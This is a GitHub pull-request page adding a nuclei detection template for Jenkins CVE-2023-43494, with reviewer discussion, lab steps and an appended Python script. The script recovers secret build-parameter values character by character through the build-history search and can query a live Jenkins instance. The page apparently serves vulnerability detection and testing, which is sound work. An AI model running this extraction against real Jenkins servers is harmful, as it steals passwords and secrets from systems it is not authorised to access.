projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

Added CVE-2023-43494 Template #10550

Open sagarwal395 opened 2 months ago

sagarwal395 commented 2 months ago

Template Information:

Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.

References: https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261 http://www.openwall.com/lists/oss-security/2023/09/20/5

Nuclei Template:

id: jenkins-cve-2023-43494

info:
  name: Jenkins CVE-2023-43494 Exploit
  author: Saumya Agarwal
  severity: medium
  description: |
    Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/09/20/5
    - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cve-id: CVE-2023-43494
    cwe-id: CWE-200
  tags: jenkins, cve-2023-43494, exploit

# Both values are supplied on the command line, e.g.
#   -var project_name=vulcheck -var search_string=nuc
# The target URL must carry the credentials (or API token) of a user
# holding Item/Read on the job.
variables:
  project_name: "{{project_name}}"
  search_string: "{{search_string}}"

# "requests:" is the deprecated v2 protocol keyword; "http:" is the v3 form.
http:
  - method: GET
    path:
      - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}"

    headers:
      accept: "*/*"
      accept-language: "en-US,en;q=0.9"
      sec-fetch-mode: "cors"
      sec-fetch-site: "same-origin"
      referer: "{{BaseURL}}/job/{{project_name}}/"

    # Without "and", the default "or" would report a hit on any 200 response,
    # i.e. on every authenticated request regardless of search result.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # A build-history table containing at least one row: the search string
      # matched a build (including its parameter values).
      - type: regex
        part: body
        regex:
          - "(?s)<table[^>]*>.*?<tr[^>]*>.*?</tr>.*?</table>"

Expected output:


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

        projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.0 (latest)
[INF] Current nuclei-templates version: v9.9.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[jenkins-cve-2023-43494] [http] [medium] http://sample:1102e6286d7b37da45c20c34d1adeb3800@localhost:8080/job/vulcheck/buildHistory/ajax?search=nuc
DhiyaneshGeek commented 2 months ago

Hi @sagarwal395

Does this require the project_name and search_string inputs to be supplied via the variable option in the CLI?

Looking forward to hearing back from you.

Thanks

sagarwal395 commented 2 months ago

Hi @DhiyaneshGeek,

Yes it does. It also requires the username and password of attackers with Item/Read permission. On a high level the issue is that the sensitive build variables like password are not excluded from search in build history and an attacker can fuzz through to get passwords used in any builds.

DhiyaneshGeek commented 2 months ago

@sagarwal395

Any docker setup instructions?

sagarwal395 commented 2 months ago

@sagarwal395

Any docker setup instructions?

As of now, no. Sorry, I have been busy with school. I will share the instructions for docker once ready. If you want to quickly test it, here are the steps:

  1. Run Jenkins 2.41x and create a project with a password parameter. Run this job once. You can update the password and run multiple jobs.
  2. Create a user with an API key with read-only permission.
  3. Test the committed nuclei template with all the info. The vulnerability allows an attacker to search for a job in the history using the password as the search string (in a real-world scenario these can be brute-forced).
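The template above checks a single search string, so it only confirms that a known value is searchable. The advisory's actual attack (and the "brute forced" step in the test instructions) is recovering an unknown parameter value one character at a time, using the build-history search as a yes/no oracle. The script below is an added example written for this PR discussion; it is not code from the PR, from the nuclei project or from Jenkins. The only detail taken from the page is the endpoint `/job/<project>/buildHistory/ajax?search=<string>`. Everything else is an assumption to be checked against the lab instance from the steps above: that the widget performs a plain (here: case-insensitive) substring match over every build's parameter values, that HTTP Basic auth with a user API token is accepted, that the PR's own regex separates a hit from an empty result, and that the value is drawn from lowercase letters and digits. A constructed in-memory oracle stands in for Jenkins so the extraction logic can be run offline.

```python
import base64
import re
import string
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

# An oracle answers one question: does some build of the job have a parameter
# value containing this search string?
Oracle = Callable[[str], bool]

# Hit predicate taken from the PR's matcher (a table with at least one row).
# ASSUMPTION: an empty result renders no <tr>; check on your Jenkins version.
HIT_RE = re.compile(r"(?s)<table[^>]*>.*?<tr[^>]*>.*?</tr>.*?</table>")


def jenkins_oracle(base_url: str, project: str, user: str, api_token: str) -> Oracle:
    """Live oracle: one authenticated GET to the build-history search per probe.

    ASSUMPTION: Basic auth with a user API token; the user only needs Item/Read.
    """
    cred = base64.b64encode(f"{user}:{api_token}".encode()).decode()

    def probe(search: str) -> bool:
        url = (f"{base_url.rstrip('/')}/job/{urllib.parse.quote(project, safe='')}"
               f"/buildHistory/ajax?search={urllib.parse.quote(search, safe='')}")
        req = urllib.request.Request(
            url, headers={"Accept": "*/*", "Authorization": f"Basic {cred}"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            body = resp.read().decode("utf-8", "replace")
        return HIT_RE.search(body) is not None

    return probe


def make_fake_oracle(param_values: Iterable[str], case_insensitive: bool = True) -> Oracle:
    """Constructed stand-in for Jenkins so the extraction can run offline.

    ASSUMPTION: the widget does a plain substring match over every build's
    parameter values (case-insensitive by default here).
    """
    vals = [v.lower() if case_insensitive else v for v in param_values]

    def probe(search: str) -> bool:
        needle = search.lower() if case_insensitive else search
        return any(needle in v for v in vals)

    return probe


def extract_secret(oracle: Oracle,
                   alphabet: str = string.ascii_lowercase + string.digits,
                   max_len: int = 64) -> Optional[str]:
    """Recover one parameter value through a substring oracle, one character at a time.

    1. find a single character that occurs in some value (the seed);
    2. extend to the right while the oracle still accepts the longer string;
    3. extend to the left the same way.
    Every accepted string is a substring of a real value, so the result is one
    whole value, provided all of its characters are in `alphabet` (a value that
    is a substring of another value is shadowed by the longer one). Cost is at
    most len(value) * len(alphabet) requests. Returns None if nothing matches.
    """
    found = next((c for c in alphabet if oracle(c)), None)
    if found is None:
        return None

    def grow(cur: str, left: bool) -> str:
        while len(cur) < max_len:
            ext = next((c for c in alphabet
                        if oracle(c + cur if left else cur + c)), None)
            if ext is None:
                return cur
            cur = ext + cur if left else cur + ext
        return cur

    return grow(grow(found, left=False), left=True)


if __name__ == "__main__":
    # Offline demo against constructed parameter values (not real data).
    print(extract_secret(make_fake_oracle(["Hunter2", "s3cret"])))  # s3cret
    # Live use against a lab instance built as in the steps above:
    # print(extract_secret(jenkins_oracle("http://localhost:8080", "vulcheck",
    #                                     "sample", "<api-token>")))
```

The greedy walk never needs to know where a value starts: any single character that appears anywhere is a valid seed, and each accepted extension stays inside one real value. If the target instance matches case-sensitively, widen `alphabet` to include uppercase letters; characters outside the alphabet terminate extraction early and truncate the recovered value. For the nuclei template itself, the same two inputs are passed as `-var project_name=vulcheck -var search_string=nuc`, and each run answers only one probe of this loop.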